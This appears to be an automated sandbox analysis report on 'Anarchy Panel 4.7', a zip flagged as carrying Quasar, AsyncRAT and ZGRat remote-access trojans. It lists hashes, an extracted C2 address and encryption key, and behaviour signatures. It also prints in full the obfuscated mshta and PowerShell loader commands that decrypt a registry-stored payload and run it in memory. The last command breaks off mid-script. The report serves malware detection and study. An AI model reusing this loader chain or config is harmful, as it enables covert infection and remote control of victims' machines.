Overview
overview
10Static
static
10Anarchy Panel 4.7.zip
windows7-x64
1Anarchy Panel 4.7.zip
windows10-2004-x64
10Anarchy Pa...el.exe
windows7-x64
10Anarchy Pa...el.exe
windows10-2004-x64
10Anarchy Pa...oG.dll
windows7-x64
1Anarchy Pa...oG.dll
windows10-2004-x64
1Anarchy Pa...uJ.dll
windows7-x64
1Anarchy Pa...uJ.dll
windows10-2004-x64
1Anarchy Pa...qM.dll
windows7-x64
1Anarchy Pa...qM.dll
windows10-2004-x64
1Anarchy Pa...LC.dll
windows7-x64
1Anarchy Pa...LC.dll
windows10-2004-x64
1Anarchy Pa...wp.dll
windows7-x64
1Anarchy Pa...wp.dll
windows10-2004-x64
1Anarchy Pa...uZ.dll
windows7-x64
1Anarchy Pa...uZ.dll
windows10-2004-x64
1Anarchy Pa...nG.dll
windows7-x64
1Anarchy Pa...nG.dll
windows10-2004-x64
1Anarchy Pa...TS.dll
windows7-x64
1Anarchy Pa...TS.dll
windows10-2004-x64
1Anarchy Pa...xj.dll
windows7-x64
1Anarchy Pa...xj.dll
windows10-2004-x64
1Anarchy Pa...pi.dll
windows7-x64
1Anarchy Pa...pi.dll
windows10-2004-x64
1Anarchy Pa...s4.dll
windows7-x64
1Anarchy Pa...s4.dll
windows10-2004-x64
1Anarchy Pa...Ya.dll
windows7-x64
1Anarchy Pa...Ya.dll
windows10-2004-x64
1Anarchy Pa...Jn.dll
windows7-x64
1Anarchy Pa...Jn.dll
windows10-2004-x64
1Anarchy Pa...GA.dll
windows7-x64
1Anarchy Pa...GA.dll
windows10-2004-x64
1Analysis
-
max time kernel
147s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20231023-en -
resource tags
arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system -
submitted
26-11-2023 16:10
Behavioral task
behavioral1
Sample
Anarchy Panel 4.7.zip
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
Anarchy Panel 4.7.zip
Resource
win10v2004-20231023-en
Behavioral task
behavioral3
Sample
Anarchy Panel 4.7/Anarchy Panel.exe
Resource
win7-20231020-en
Behavioral task
behavioral4
Sample
Anarchy Panel 4.7/Anarchy Panel.exe
Resource
win10v2004-20231020-en
Behavioral task
behavioral5
Sample
Anarchy Panel 4.7/Plugins/0guo3zbo66fqoG.dll
Resource
win7-20231023-en
Behavioral task
behavioral6
Sample
Anarchy Panel 4.7/Plugins/0guo3zbo66fqoG.dll
Resource
win10v2004-20231023-en
Behavioral task
behavioral7
Sample
Anarchy Panel 4.7/Plugins/59Zp7paEHDF7luJ.dll
Resource
win7-20231020-en
Behavioral task
behavioral8
Sample
Anarchy Panel 4.7/Plugins/59Zp7paEHDF7luJ.dll
Resource
win10v2004-20231025-en
Behavioral task
behavioral9
Sample
Anarchy Panel 4.7/Plugins/CjETR6GpGXqM.dll
Resource
win7-20231023-en
Behavioral task
behavioral10
Sample
Anarchy Panel 4.7/Plugins/CjETR6GpGXqM.dll
Resource
win10v2004-20231023-en
Behavioral task
behavioral11
Sample
Anarchy Panel 4.7/Plugins/EVa7gBMKoaHmLC.dll
Resource
win7-20231023-en
Behavioral task
behavioral12
Sample
Anarchy Panel 4.7/Plugins/EVa7gBMKoaHmLC.dll
Resource
win10v2004-20231020-en
Behavioral task
behavioral13
Sample
Anarchy Panel 4.7/Plugins/FBSyChwp.dll
Resource
win7-20231023-en
Behavioral task
behavioral14
Sample
Anarchy Panel 4.7/Plugins/FBSyChwp.dll
Resource
win10v2004-20231020-en
Behavioral task
behavioral15
Sample
Anarchy Panel 4.7/Plugins/G3nl0mDcABnDuZ.dll
Resource
win7-20231020-en
Behavioral task
behavioral16
Sample
Anarchy Panel 4.7/Plugins/G3nl0mDcABnDuZ.dll
Resource
win10v2004-20231025-en
Behavioral task
behavioral17
Sample
Anarchy Panel 4.7/Plugins/KNTmoSnG.dll
Resource
win7-20231023-en
Behavioral task
behavioral18
Sample
Anarchy Panel 4.7/Plugins/KNTmoSnG.dll
Resource
win10v2004-20231023-en
Behavioral task
behavioral19
Sample
Anarchy Panel 4.7/Plugins/PK0TcnqTGFagQTS.dll
Resource
win7-20231025-en
Behavioral task
behavioral20
Sample
Anarchy Panel 4.7/Plugins/PK0TcnqTGFagQTS.dll
Resource
win10v2004-20231020-en
Behavioral task
behavioral21
Sample
Anarchy Panel 4.7/Plugins/RssCnLKcGRxj.dll
Resource
win7-20231023-en
Behavioral task
behavioral22
Sample
Anarchy Panel 4.7/Plugins/RssCnLKcGRxj.dll
Resource
win10v2004-20231023-en
Behavioral task
behavioral23
Sample
Anarchy Panel 4.7/Plugins/WkUP83aP9CABpi.dll
Resource
win7-20231020-en
Behavioral task
behavioral24
Sample
Anarchy Panel 4.7/Plugins/WkUP83aP9CABpi.dll
Resource
win10v2004-20231020-en
Behavioral task
behavioral25
Sample
Anarchy Panel 4.7/Plugins/eMTYbTz0gueNs4.dll
Resource
win7-20231023-en
Behavioral task
behavioral26
Sample
Anarchy Panel 4.7/Plugins/eMTYbTz0gueNs4.dll
Resource
win10v2004-20231023-en
Behavioral task
behavioral27
Sample
Anarchy Panel 4.7/Plugins/fzAgyDYa.dll
Resource
win7-20231020-en
Behavioral task
behavioral28
Sample
Anarchy Panel 4.7/Plugins/fzAgyDYa.dll
Resource
win10v2004-20231020-en
Behavioral task
behavioral29
Sample
Anarchy Panel 4.7/Plugins/mGWHaG2Jn.dll
Resource
win7-20231023-en
Behavioral task
behavioral30
Sample
Anarchy Panel 4.7/Plugins/mGWHaG2Jn.dll
Resource
win10v2004-20231025-en
Behavioral task
behavioral31
Sample
Anarchy Panel 4.7/Plugins/mML6WKMqdxjDGA.dll
Resource
win7-20231020-en
Behavioral task
behavioral32
Sample
Anarchy Panel 4.7/Plugins/mML6WKMqdxjDGA.dll
Resource
win10v2004-20231023-en
General
-
Target
Anarchy Panel 4.7.zip
-
Size
63.6MB
-
MD5
a556f57a0bbb7c1044d39e8e3a139f56
-
SHA1
39696049c9dae95abb05ddf30d0b2f608a14722c
-
SHA256
58ee8da1d2bd0961e4d61868fbc2bb8e05c23211af585a01137e92708a7acb18
-
SHA512
05779c77f3f786260f0d3da90ac766a9d24e74d3dad36d980b43e3f63e400767af25d635321245b43c5fe9e5f1f0f6c57aea164a662cc9b6422889c78b11868a
-
SSDEEP
1572864:qDGE62dWWbowBWaCfGZUqjUfhzQIEy72agNIi:qDGE62dNsqt/YpvESYP
Malware Config
Extracted
quasar
1.0.0.0
v3.0.0 | Slave
147.185.221.17:25792
92d55a7d-fa9d-4687-a639-1c17ad82e127
-
encryption_key
AAADD171AFB4583A86B8E61A97433E10C4015A71
-
install_name
.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
3000
Signatures
-
Detect ZGRat V1 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe family_zgrat_v1 C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe family_zgrat_v1 C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe family_zgrat_v1 behavioral2/memory/3564-16-0x00000000005C0000-0x0000000003C5E000-memory.dmp family_zgrat_v1 -
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1488-114-0x000001D946020000-0x000001D94681A000-memory.dmp family_quasar -
Async RAT payload 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe asyncrat C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe asyncrat C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe asyncrat behavioral2/memory/3564-16-0x00000000005C0000-0x0000000003C5E000-memory.dmp asyncrat behavioral2/memory/3564-54-0x000000001E7D0000-0x000000001E7E0000-memory.dmp asyncrat behavioral2/memory/1488-114-0x000001D946020000-0x000001D94681A000-memory.dmp asyncrat -
.NET Reactor proctector 4 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe net_reactor C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe net_reactor C:\Users\Admin\AppData\Local\Temp\Anarchy Panel.exe net_reactor behavioral2/memory/3564-16-0x00000000005C0000-0x0000000003C5E000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
$sxr-mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation $sxr-mshta.exe -
Executes dropped EXE 6 IoCs
Processes:
Anarchy Panel.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exe$sxr-cmd.exe$sxr-powershell.exepid process 3564 Anarchy Panel.exe 4016 $sxr-mshta.exe 1900 $sxr-cmd.exe 1488 $sxr-powershell.exe 2788 $sxr-cmd.exe 4296 $sxr-powershell.exe -
Loads dropped DLL 1 IoCs
Processes:
Anarchy Panel.exepid process 3564 Anarchy Panel.exe -
Drops file in System32 directory 2 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe -
Drops file in Windows directory 6 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\$sxr-mshta.exe powershell.exe File created C:\Windows\$sxr-cmd.exe powershell.exe File opened for modification C:\Windows\$sxr-cmd.exe powershell.exe File created C:\Windows\$sxr-powershell.exe powershell.exe File opened for modification C:\Windows\$sxr-powershell.exe powershell.exe File created C:\Windows\$sxr-mshta.exe powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exewmiprvse.exedescription ioc process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe -
Modifies registry class 1 IoCs
Processes:
$sxr-mshta.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ $sxr-mshta.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeAnarchy Panel.exe$sxr-powershell.exe$sxr-powershell.exepid process 4764 powershell.exe 4764 powershell.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 3564 Anarchy Panel.exe 4764 powershell.exe 4764 powershell.exe 4764 powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 4296 $sxr-powershell.exe 4296 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe 1488 $sxr-powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Anarchy Panel.exepowershell.exe$sxr-powershell.exeExplorer.EXE$sxr-powershell.exesvchost.exedescription pid process Token: SeDebugPrivilege 3564 Anarchy Panel.exe Token: SeDebugPrivilege 4764 powershell.exe Token: SeDebugPrivilege 4764 powershell.exe Token: SeDebugPrivilege 4764 powershell.exe Token: SeDebugPrivilege 1488 $sxr-powershell.exe Token: SeDebugPrivilege 1488 $sxr-powershell.exe Token: SeDebugPrivilege 1488 $sxr-powershell.exe Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeDebugPrivilege 4296 $sxr-powershell.exe Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 2624 svchost.exe Token: SeIncreaseQuotaPrivilege 2624 svchost.exe Token: SeSecurityPrivilege 2624 svchost.exe Token: SeTakeOwnershipPrivilege 2624 svchost.exe Token: SeLoadDriverPrivilege 2624 svchost.exe Token: SeSystemtimePrivilege 2624 svchost.exe Token: SeBackupPrivilege 2624 svchost.exe Token: SeRestorePrivilege 2624 svchost.exe Token: SeShutdownPrivilege 2624 svchost.exe Token: SeSystemEnvironmentPrivilege 2624 svchost.exe Token: SeUndockPrivilege 2624 svchost.exe Token: SeManageVolumePrivilege 2624 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2624 svchost.exe Token: SeIncreaseQuotaPrivilege 2624 svchost.exe Token: SeSecurityPrivilege 2624 svchost.exe Token: SeTakeOwnershipPrivilege 2624 svchost.exe Token: SeLoadDriverPrivilege 2624 svchost.exe Token: SeSystemtimePrivilege 2624 svchost.exe Token: SeBackupPrivilege 2624 svchost.exe Token: SeRestorePrivilege 2624 svchost.exe Token: SeShutdownPrivilege 2624 svchost.exe Token: SeSystemEnvironmentPrivilege 2624 svchost.exe Token: SeUndockPrivilege 2624 svchost.exe Token: SeManageVolumePrivilege 2624 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2624 svchost.exe Token: SeIncreaseQuotaPrivilege 2624 svchost.exe Token: SeSecurityPrivilege 2624 svchost.exe Token: SeTakeOwnershipPrivilege 2624 svchost.exe Token: SeLoadDriverPrivilege 2624 svchost.exe Token: SeSystemtimePrivilege 2624 svchost.exe Token: SeBackupPrivilege 2624 svchost.exe Token: SeRestorePrivilege 2624 svchost.exe Token: SeShutdownPrivilege 2624 svchost.exe Token: SeSystemEnvironmentPrivilege 2624 svchost.exe Token: SeUndockPrivilege 2624 svchost.exe Token: SeManageVolumePrivilege 2624 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2624 svchost.exe Token: SeIncreaseQuotaPrivilege 2624 svchost.exe Token: SeSecurityPrivilege 2624 svchost.exe Token: SeTakeOwnershipPrivilege 2624 svchost.exe Token: SeLoadDriverPrivilege 2624 svchost.exe Token: SeSystemtimePrivilege 2624 svchost.exe Token: SeBackupPrivilege 2624 svchost.exe Token: SeRestorePrivilege 2624 svchost.exe Token: SeShutdownPrivilege 2624 svchost.exe Token: SeSystemEnvironmentPrivilege 2624 svchost.exe Token: SeUndockPrivilege 2624 svchost.exe Token: SeManageVolumePrivilege 2624 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2624 svchost.exe Token: SeIncreaseQuotaPrivilege 2624 svchost.exe Token: SeSecurityPrivilege 2624 svchost.exe Token: SeTakeOwnershipPrivilege 2624 svchost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
Anarchy Panel.exepid process 3564 Anarchy Panel.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
Anarchy Panel.exepid process 3564 Anarchy Panel.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
$sxr-powershell.exepid process 1488 $sxr-powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Anarchy Panel.execmd.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exelsass.exedescription pid process target process PID 3008 wrote to memory of 3564 3008 Anarchy Panel.exe Anarchy Panel.exe PID 3008 wrote to memory of 3564 3008 Anarchy Panel.exe Anarchy Panel.exe PID 3008 wrote to memory of 1532 3008 Anarchy Panel.exe cmd.exe PID 3008 wrote to memory of 1532 3008 Anarchy Panel.exe cmd.exe PID 1532 wrote to memory of 5060 1532 cmd.exe cmd.exe PID 1532 wrote to memory of 5060 1532 cmd.exe cmd.exe PID 1532 wrote to memory of 4764 1532 cmd.exe powershell.exe PID 1532 wrote to memory of 4764 1532 cmd.exe powershell.exe PID 4016 wrote to memory of 1900 4016 $sxr-mshta.exe $sxr-cmd.exe PID 4016 wrote to memory of 1900 4016 $sxr-mshta.exe $sxr-cmd.exe PID 1900 wrote to memory of 1672 1900 $sxr-cmd.exe cmd.exe PID 1900 wrote to memory of 1672 1900 $sxr-cmd.exe cmd.exe PID 1900 wrote to memory of 1488 1900 $sxr-cmd.exe $sxr-powershell.exe PID 1900 wrote to memory of 1488 1900 $sxr-cmd.exe $sxr-powershell.exe PID 1488 wrote to memory of 620 1488 $sxr-powershell.exe winlogon.exe PID 1488 wrote to memory of 684 1488 $sxr-powershell.exe lsass.exe PID 1488 wrote to memory of 960 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 336 1488 $sxr-powershell.exe dwm.exe PID 1488 wrote to memory of 664 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 1056 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 1064 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 1168 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 1188 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 1224 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 1268 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 1376 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 1400 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 1424 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 1440 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 1544 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 1600 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 1648 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 1688 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 1752 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 1848 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 1964 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 1972 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 1980 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 376 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 2040 1488 $sxr-powershell.exe spoolsv.exe PID 1488 wrote to memory of 2092 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 2196 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 2328 1488 $sxr-powershell.exe sihost.exe PID 1488 wrote to memory of 2340 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 2424 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 2432 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 2464 1488 $sxr-powershell.exe taskhostw.exe PID 1488 wrote to memory of 2500 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 2560 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 2608 1488 $sxr-powershell.exe sysmon.exe PID 1488 wrote to memory of 2616 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 2624 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 2640 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 2676 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 676 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 1328 1488 $sxr-powershell.exe unsecapp.exe PID 1488 wrote to memory of 3292 1488 $sxr-powershell.exe Explorer.EXE PID 1488 wrote to memory of 3472 1488 $sxr-powershell.exe svchost.exe PID 1488 wrote to memory of 3660 1488 $sxr-powershell.exe DllHost.exe PID 684 wrote to memory of 2608 684 lsass.exe sysmon.exe PID 684 wrote to memory of 2608 684 lsass.exe sysmon.exe PID 1488 wrote to memory of 3828 1488 $sxr-powershell.exe RuntimeBroker.exe PID 1488 wrote to memory of 4056 1488 $sxr-powershell.exe RuntimeBroker.exe PID 1488 wrote to memory of 5004 1488 $sxr-powershell.exe RuntimeBroker.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:684
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:620
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1168
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2464
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-TwfkFnoyLGWlxhzmArsw4312:POYjSNFM=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-TwfkFnoyLGWlxhzmArsw4312:POYjSNFM=%3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function ASDgm($hbtlH){ $jvCLB=[System.Security.Cryptography.Aes]::Create(); $jvCLB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jvCLB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jvCLB.Key=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('blz4wP7NQ0z9G5HU5qt1rBXWDUDwhPjk4R14Im6s+lY='); $jvCLB.IV=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('tyHaD0iUmC1atKVX/rbjZw=='); $bkHaC=$jvCLB.('@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@'.Replace('@', ''))(); $KdWyo=$bkHaC.('@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@'.Replace('@', ''))($hbtlH, 0, $hbtlH.Length); $bkHaC.Dispose(); $jvCLB.Dispose(); $KdWyo;}function cHftl($hbtlH){ $ZLGfO=New-Object System.IO.MemoryStream(,$hbtlH); $pEGfA=New-Object System.IO.MemoryStream; Invoke-Expression '$YNTor @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$ZLGfO,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $YNTor.CopyTo($pEGfA); $YNTor.Dispose(); $ZLGfO.Dispose(); $pEGfA.Dispose(); $pEGfA.ToArray();}function cDPce($hbtlH){ $KdWyo = [System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($hbtlH); $KdWyo = ASDgm($KdWyo); $KdWyo = [System.Text.Encoding]::('@U@T@F@8@'.Replace('@', '')).('@G@e@t@S@t@r@i@n@g@'.Replace('@', ''))($KdWyo); return $KdWyo;}function execute_function($hbtlH,$HyIWf){ $wMvLZ = @( '$gbejj = [System.Reflection.Assembly]::Load([byte[]]$hbtlH);', '$nYAXe = $gbejj.EntryPoint;', '$nYAXe.Invoke($null, $HyIWf);' ); foreach ($XGPPP in $wMvLZ) { Invoke-Expression $XGPPP };}$WwewB = cDPce('6jh9/JwNM6P3zg5yY8XZBg==');$pAwEN = cDPce('ZViCuth6vUsFE5+msWnrZo/mOl8APvimIOP0OBotRXY=');$EiozW = cDPce('e/do7iEa4WyK+N/slo150A==');$xMYjW = cDPce('0AZpRDqOSBwoRnb0ckOSHA==');if (@(get-process -ea silentlycontinue $xMYjW).count -gt 1) {exit};$AmhAI = [Microsoft.Win32.Registry]::('@L@o@c@a@l@M@a@c@h@i@n@e@'.Replace('@', '')).('@O@p@e@n@S@u@b@k@e@y@'.Replace('@', ''))($WwewB).('@G@e@t@V@a@l@u@e@'.Replace('@', ''))($pAwEN);$lPNsi=cHftl (ASDgm ([Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($AmhAI)));execute_function $lPNsi (,[string[]] ($EiozW)); "4⤵PID:1672
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /C echo [System.Diagnostics.Process]::GetProcessById(1488).WaitForExit();[System.Threading.Thread]::Sleep(5000); function ASDgm($hbtlH){ $jvCLB=[System.Security.Cryptography.Aes]::Create(); $jvCLB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jvCLB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jvCLB.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('blz4wP7NQ0z9G5HU5qt1rBXWDUDwhPjk4R14Im6s+lY='); $jvCLB.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('tyHaD0iUmC1atKVX/rbjZw=='); $bkHaC=$jvCLB.("@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@".Replace("@", ""))(); $KdWyo=$bkHaC.("@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@".Replace("@", ""))($hbtlH, 0, $hbtlH.Length); $bkHaC.Dispose(); $jvCLB.Dispose(); $KdWyo;}function cHftl($hbtlH){ $ZLGfO=New-Object System.IO.MemoryStream(,$hbtlH); $pEGfA=New-Object System.IO.MemoryStream; Invoke-Expression '$YNTor @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$ZLGfO,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $YNTor.CopyTo($pEGfA); $YNTor.Dispose(); $ZLGfO.Dispose(); $pEGfA.Dispose(); $pEGfA.ToArray();}function cDPce($hbtlH){ $KdWyo = [System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($hbtlH); $KdWyo = ASDgm($KdWyo); $KdWyo = [System.Text.Encoding]::("@U@T@F@8@".Replace("@", "")).("@G@e@t@S@t@r@i@n@g@".Replace("@", ""))($KdWyo); 